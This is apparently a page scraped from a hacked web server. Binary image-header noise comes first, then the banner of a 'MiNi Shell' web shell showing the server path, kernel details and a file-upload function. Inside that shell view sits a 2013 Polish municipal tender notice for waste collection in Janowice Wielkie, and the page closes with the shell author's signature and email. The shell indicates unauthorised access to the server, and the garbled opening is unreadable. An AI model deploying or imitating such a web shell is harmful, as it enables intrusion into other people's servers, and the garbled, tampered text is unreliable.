JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130409/138494-N-2013.html

<p class="kh_header"><b>Janowice Wielkie: Świadczenie usług w zakresie odbioru,transportu i zagospodarowania odpadów komunalnych oraz ustabilizowanych komunalnych osadów ściekowych powstałych na terenie gminy Janowice Wielkie</b><br>
<b>Numer ogłoszenia: 138494 - 2013; data zamieszczenia: 09.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Janowice Wielkie , ul. Kolejowa 2, 58-520 Janowice Wielkie, woj. dolnośląskie, tel. 075 7515124, faks 075 7515124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.janowicewielkie.eu/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie odbioru,transportu i zagospodarowania odpadów komunalnych oraz ustabilizowanych komunalnych osadów ściekowych powstałych na terenie gminy Janowice Wielkie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1.Nazwa nadana zamówieniu przez zamawiającego :Świadczenie usług w
zakresie odbioru, transportu i zagospodarowania odpadów komunalnych
oraz ustabilizowanych komunalnych osadów ściekowych powstałych na
terenie gminy Janowice Wielkie.
2.4.Przedmiot zamówienia obejmuje:
W okresie od.22.06.2013r.-30.06.2013r.:
a) przeprowadzenie kampanii informacyjnej, w tym także podczas święta gminy
Janowice Wielkie (Janowianki) dnia 22.06.2013 r. przez wydanie i rozprowadzenie
wśród mieszkańców gminy co najmniej 3 tysięcy ulotek zawierających informacje
dotyczące nowych zasad gospodarki odpadami oraz 50 plakatów, a także w formie
spotkań sołeckich.
W okresie od.01.07.2013r.-31.12.2014r.:
b)odbiór odpadów komunalnych z granicy nieruchomości i ich transport do
Regionalnej Instalacji Przetwarzania Odpadów Komunalnych, a ponadto
zagospodarowanie tychże odpadów komunalnych z nieruchomości zamieszkałych
powstałych na terenie gminy Janowice Wielkie z częstotliwością wynikającą z
uchwał Rady Gminy(raz na miesiąc w przypadku nieruchomości jednorodzinnych,
dwa razy na miesiąc z nieruchomości wielomieszkaniowych.) zbieranych w sposób
selektywny i nieselektywny
c)odbiór z granicy nieruchomości, transport do Regionalnej Instalacji Przetwarzania
Odpadów Komunalnych i zagospodarowanie odpadów komunalnych z
nieruchomości niezamieszkałych powstałych na terenie gminy Janowice Wielkie z
częstotliwością wynikającą z uchwał Rady Gminy- raz na miesiąc.
d)odbiór z worków/pojemników selektywnie zebranych odpadów takich jak :
-papier,
-szkło,
-tworzywa sztuczne,
-metale,
-odpady ulegające biodegradacji.
e) utrzymanie porządku i czystości w promieniu 3 metrów od pojemników oraz
utrzymanie czystości i porządku w procesie wywozu,
f)opróżnianie koszy ulicznych i gniazd ustawionych na boiskach, placach zabaw i
przystankach autobusowych, cmentarzach zgodnie z wykazem przekazanym przez
Gminę, znajdujących się bezpośrednio przy trasie przejazdu śmieciarki (4 razy w
miesiącu),
g) odbiór przedmiotów wielkogabarytowych, sprzętu elektrycznego i elektronicznego
dwa razy w roku,w okresie wiosennym i jesiennym, szczegółowe terminy zostaną
podane przez Zamawiającego,
h)odbiór odpadów budowlanych i rozbiórkowych z granicy nieruchomości w ilości
do 200 kg i transport do gminnego Punktu zbierania Odpadów, w przypadku większej
ilości odbiór na zlecenie Zamawiającego i transport do gminnego Punktu zbierania Odpadów na zasadach określonych w umowie,
i) zorganizowanie obsługi Gminnego Punktu Zbierania Odpadów na terenie
oczyszczalni ścieków w Janowicach Wielkich przy ulicy Sportowej przy
wykorzystaniu pracowników zapewnionych przez Zamawiającego oraz bezpłatnie
udostępnionego gruntu co najmniej 3 razy w tygodniu, w tym raz w sobotę lub
niedzielę.
j) dostarczanie do nieruchomości worków do selektywnej zbiórki odpadów ( 12
zestawów 5 worków po 1 w każdym kolorze) z tasiemką do zawiązywania co
najmniej raz do roku, a także zapewnienie specjalnego zapasu na szczególne potrzeby
w Urzędzie Gminy przy zachowaniu następujących parametrów:
Kolor zielony- z przeznaczeniem na szkło- grubość co najmniej 80 mikronów,
Kolor niebieski- z przeznaczeniem na makulaturę,
Kolor żółty- z przeznaczeniem na tworzywa sztuczne i metale,
Kolor brązowy- z przeznaczeniem na odpady ulegające biodegradacji, worek
wykonany z tworzywa biodegradowalnego,
Kolor czarny- z przeznaczeniem na odpady niesegregowane (zmieszane);
Charakterystyka worków do selektywnej zbiórki odpadów:
- materiał - folia polietylenowa LDPE,
- pojemność - 120 dmł,
- kolor - żółty, niebieski, zielony,brązowy, czarny,
- grubość - co najmniej 60 mikronów,( z zaznaczeniem worka na szkło co najmniej
80 mikronów)
- nadruk - jednostronny, wskazujący frakcję odpadów w nim gromadzoną,
przy czym Zamawiający dostarczy Wykonawcy wykaz nieruchomości, których
właściciele kompostują odpady w celu nie dostarczania im worków w kolorze
brązowym
k)Charakterystyka worków do selektywnej zbiórki odpadów:
- materiał - folia polietylenowa LDPE,
- pojemność - 120 dm3,
- kolor - żółty, niebieski, zielony,brązowy, czarny,
- grubość - co najmniej 60 mikronów,( z zaznaczeniem worka na szkło co najmniej
80 mikronów)
- nadruk - jednostronny, wskazujący frakcję gromadzoną w danym worku oraz
informację czego nie należy wrzucać.
Gmina dostarczy przedsiębiorcy wykaz nieruchomości, których właściciele
kompostują odpady w celu nie dostarczania im worków w kolorze brązowym.
W przypadku zużycia przekazanej ilości worków przez właścicieli worki zostaną
przekazane bezpłatnie zgodnie z racjonalnym zapotrzebowaniem.
l) umożliwienie mieszkańcom dzierżawy lub zakupu pojemników do segregacji
odpadów na podstawie odrębnej umowy oraz ich dostarczenie, w przypadku
pojemników na odpady biodegradowalne muszą być one wyposażone w odpowiedni
system napowietrzania,
ł)zapewnienie naklejek z kodem kreskowym na pojemniki lub worki,
umożliwiających identyfikację gospodarstw domowych,
m)zapewnienie gniazd ulicznych w ilości 9 gniazd dostępnych dla wszystkich
mieszkańców- pojemniki stanowią własność Gminy,
n) zapewnienie jednego pojemnika typu DPM-1100 z przeznaczeniem na plastik w
okolicy boiska Orlik przy ulicy Sportowej w Janowicach Wielkich działka nr 596;1
oraz odbiór, transport i zagospodarowanie zebranych odpadów,
o) zapewnienie pojemnika na przeterminowane leki w aptece oraz ich odbiór,
transport i zagospodarowanie,
p) zapewnienie 6 pojemników na zużyte baterie oraz ich odbiór, transport i
zagospodarowanie
- 1 w Urzędzie Gminy
- 1 w Szkole w Janowicach Wielkich,
- 1 w sklepie spożywczym w miejscowości Janowice Wielkie,
- 1 w sklepie spożywczym w miejscowości Trzcińsko,
- 1 w sklepie spożywczym w miejscowości Radomierz,
- 1 w sklepie spożywczym w miejscowości Komarno,
q) odbiór i zagospodarowanie popiołów z gospodarstw domowych w ramach
odpadów zmieszanych,
r) odbiór, transport i zagospodarowanie ustabilizowanych komunalnych osadów
ściekowych do Regionalnej Instalacji Przetwarzania Odpadów komunalnych w
miejscowości Lubomierz,
s)bieżące prowadzenie ilościowej i jakościowej ewidencji odpadów oraz
sprawozdawczość zgodnie z obowiązującymi przepisami,
t)pełną odpowiedzialność wobec zamawiającego i osób trzecich za szkody powstałe
podczas realizacji przedmiotu zamówienia,
u) mycie i dezynfekcję pojemników oraz koszy ulicznych 2 razy do roku.
v)zapewnienie systemu komputerowego umożliwiającego zamawiającemu
sprawdzenie on-line wykonanie usługi .
w)skanowanie worków/pojemników do selektywnej zbiórki odpadów przy odbiorze
oraz elektroniczne raportowanie o ilości odebranych odpadów raz w miesiącu.
2.5.Informacja : poziom odpadów komunalnych ulegających biodegradacji
przekazanych do składowania wynosił w 1995 roku: 197,64 Mg.
2.6. Liczba nieruchomości niezamieszkałych:
Liczba obiektów handlowych i usługowych : około 20 stan na dzień 11.03.2013r.
Liczba obiektów hotelarskich:13stan na dzień 11.03.2013r.
Liczba szkół i przedszkoli : 2 stan na dzień 11.03.2013r.
Liczba szpitali,domów pomocy społecznej i ośrodków rehabilitacji:3 stan na dzień
11.03.2013r.
Liczba obiektów gastronomicznych :5 stan na dzień 11.03.2013r.
Liczba zakładów produkcyjnych:5stan na dzień 11.03.2013r.
Liczba czynnych cmentarzy: 1 stan na dzień 11.03.2013r.
Liczba urzędów i parafii: 5 stan na dzień 11.03.2013r.
Liczba bibliotek:4 stan na dzień 11.03.2013r.
Liczba przychodni lekarskich:1 stan na dzień 11.03.2013r.
Liczba obiektów zabytkowych:1 stan na dzień 11.03.2013r.
Liczba parkingów: 1 stan na dzień 11.03.2013r.
2.7.Szacunkowa Ilość wytwarzanych ustabilizowanych komunalnych osadów ściekowych w okresie trwania umowy- 140 m3..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.13.00-5, 90.51.32.00-8, 90.51.37.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 559.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.1. Wykonawca przystępujący do przetargu jest zobowiązany do wniesienia
wadium przed upływem terminu składania ofert w kwocie 10.000 zł (słownie
dziesięć tysięcy złotych).
10.2.Wadium może być wniesione w jednej lub kilku następujących formach :
a) pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowokredytowej,
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2
ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości ( Dz.U.z 2007r. Nr 42, poz. 275).
10.3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy :
Bank Gospodarki Żywnościowej Nr 54 2030 0045 1110 0000 0080 3360
10.4. Wadium wnoszone w pieniądzu musi znajdować się na rachunku bankowym
Zamawiającego przed upływem terminu składania ofert. Kserokopię dowodu wpłaty
należy załączyć do oferty.
10.5.Wadium wnoszone w innej formie niż w pieniądzu należy dołączyć do oferty.
10.6.W przypadku wniesienia wadium w formie gwarancji bankowych lub
ubezpieczeniowych w treści gwarancji winny być podane wszystkie przypadki
powodujące utratę wadium( zgodnie z art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień
publicznych) oraz zapis, że w przypadku zaistnienia jednej z okoliczności
powodujących utratę wadium Gwarant zobowiązuje się nieodwołalnie i
bezwarunkowo do zapłacenia na pierwsze żądanie beneficjenta każdej kwoty do
maksymalnej wysokości podanej w gwarancji.
10.7.Wykonawca, który nie wniesie wadium zostanie wykluczony z przetargu.
10.8.Zamawiający zwraca wadium niezwłocznie w sytuacjach przewidzianych w
ustawie Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 ustawy tzn:
3.1.posiadają zezwolenie na prowadzenie działalności w zakresie odbioru odpadów
komunalnych o kodach (15 01 01, 15 01 02, 15 01 06, 15 01 07, 17 01 01, 17 01 02,
20 01 35, 20 01 36, 20 02 01, 20 03 01, 20 03 07od właścicieli nieruchomości,
wydane przez właściwy organ.
3.5.posiadają zezwolenie na zbieranie i transport odpadów wydane przez właściwy
organ.
3.6. posiadają zezwolenie na prowadzenie działalności w zakresie odbioru zużytego
sprzętu elektrycznego i elektronicznego wydane przez Głównego Inspektora Ochrony
Środowiska.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 ustawy tzn: posiadają niezbędną wiedzę i doświadczenie. Wykonawca składając ofertę składa oświadczenie zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 ustawy tzn: dysponują potencjałem technicznym lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Wykonawca składając ofertę składa oświadczenie zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 ustawy tzn: dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Wykonawca składając ofertę składa oświadczenie zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 ustawy tzn: znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. przychód z zakresu usług tożsamych z zamówieniem w kwocie co najmniej 200 000 zł w skali roku 2012 lub w kwocie co najmniej 50 000 zł w miesiącu styczniu 2013 r.
W przypadku konsorcjum wymagania musi spełniać przynajmniej jeden z
przedsiębiorców. Wykonawca składając ofertę składa oświadczenie zgodnie z załącznikiem nr 3 i nr 5 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki
określone w art. 22 ust. 1 ustawy tzn: znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. przychód z zakresu usług tożsamych z zamówieniem w kwocie co najmniej 200 000 zł w skali roku 2012 lub w kwocie co najmniej 50 000 zł w miesiącu styczniu 2013 r.
W przypadku konsorcjum wymagania musi spełniać przynajmniej jeden z
przedsiębiorców.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienie ustanawiają
Pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich w
postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. Zaleca się, aby
Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie
zamówienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gmina.janowice.wielkie.sisco.info/zalaczniki/1860/siwz_08.04.2013_r.pdf<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Janowice Wielkie, 58-520 Janowice Wielkie, ul. Kolejowa 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2013 godzina 09:00, miejsce: Urząd Gminy Janowice Wielkie ul. Kolejowa 2, 58-520 Janowice Wielkie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com